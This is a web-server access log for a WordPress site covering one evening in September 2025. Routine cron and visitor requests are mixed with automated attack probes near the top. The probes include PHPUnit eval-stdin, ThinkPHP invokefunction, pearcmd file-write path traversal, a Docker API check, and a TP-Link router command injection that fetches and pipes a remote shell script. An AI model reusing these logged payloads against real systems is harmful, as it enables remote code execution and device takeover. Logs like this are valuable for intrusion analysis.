183.87.153.86 - - [08/Sep/2025:20:53:26 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
183.87.153.86 - - [08/Sep/2025:20:53:26 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65160 "-" "libredtail-http"
183.87.153.86 - - [08/Sep/2025:20:53:27 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
183.87.153.86 - - [08/Sep/2025:20:53:27 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
183.87.153.86 - - [08/Sep/2025:20:53:29 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
183.87.153.86 - - [08/Sep/2025:20:53:29 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
183.87.153.86 - - [08/Sep/2025:20:53:33 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
121.167.125.180 - - [08/Sep/2025:20:55:30 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
121.167.125.180 - - [08/Sep/2025:20:55:30 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [08/Sep/2025:20:55:30 +0800] "POST /wp-cron.php?doing_wp_cron=1757336130.7295429706573486328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [08/Sep/2025:21:07:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757336833.3546149730682373046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [08/Sep/2025:21:07:13 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [08/Sep/2025:21:14:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757337279.6460990905761718750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [08/Sep/2025:21:14:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [08/Sep/2025:21:22:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757337751.8064179420471191406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [08/Sep/2025:21:22:51 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
45.89.70.31 - - [08/Sep/2025:21:50:22 +0800] "GET / HTTP/1.0" 200 165852 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
45.89.70.31 - - [08/Sep/2025:21:50:23 +0800] "GET /contacts/ HTTP/1.0" 200 76104 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
36.133.115.36 - - [08/Sep/2025:21:50:26 +0800] "POST /wp-cron.php?doing_wp_cron=1757339425.9697599411010742187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.70.31 - - [08/Sep/2025:21:50:27 +0800] "POST /contacts/ HTTP/1.0" 200 68830 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
36.133.115.36 - - [08/Sep/2025:21:52:47 +0800] "POST /wp-cron.php?doing_wp_cron=1757339567.7096860408782958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [08/Sep/2025:21:52:48 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [08/Sep/2025:21:56:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757339788.6633870601654052734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
118.195.165.218 - - [08/Sep/2025:21:56:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
118.195.165.218 - - [08/Sep/2025:21:56:34 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
42.236.17.213 - - [08/Sep/2025:22:30:01 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [08/Sep/2025:22:30:09 +0800] "POST /wp-cron.php?doing_wp_cron=1757341809.8089160919189453125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.213 - - [08/Sep/2025:22:30:09 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.135.193.100 - - [08/Sep/2025:22:30:32 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.12.194 - - [08/Sep/2025:22:38:06 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [08/Sep/2025:22:38:07 +0800] "POST /wp-cron.php?doing_wp_cron=1757342287.6892371177673339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.12.194 - - [08/Sep/2025:22:38:11 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
91.224.92.17 - - [08/Sep/2025:22:38:27 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [08/Sep/2025:22:44:40 +0800] "POST /wp-cron.php?doing_wp_cron=1757342680.1277389526367187500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [08/Sep/2025:22:44:41 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [08/Sep/2025:22:59:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757343556.5440540313720703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [08/Sep/2025:22:59:16 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [08/Sep/2025:23:01:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757343711.8670580387115478515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
71.6.232.24 - - [08/Sep/2025:23:01:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
183.134.59.133 - - [08/Sep/2025:23:02:24 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16"
183.134.59.133 - - [08/Sep/2025:23:02:54 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
36.133.115.36 - - [08/Sep/2025:23:15:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757344515.5736279487609863281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [08/Sep/2025:23:15:15 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [08/Sep/2025:23:21:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757344885.7524290084838867187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.244.251 - - [08/Sep/2025:23:21:26 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
116.179.32.101 - - [08/Sep/2025:23:23:01 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [08/Sep/2025:23:39:38 +0800] "POST /wp-cron.php?doing_wp_cron=1757345978.7754580974578857421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [08/Sep/2025:23:39:58 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [08/Sep/2025:23:58:37 +0800] "POST /wp-cron.php?doing_wp_cron=1757347117.5549459457397460937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.145.117 - - [08/Sep/2025:23:58:37 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"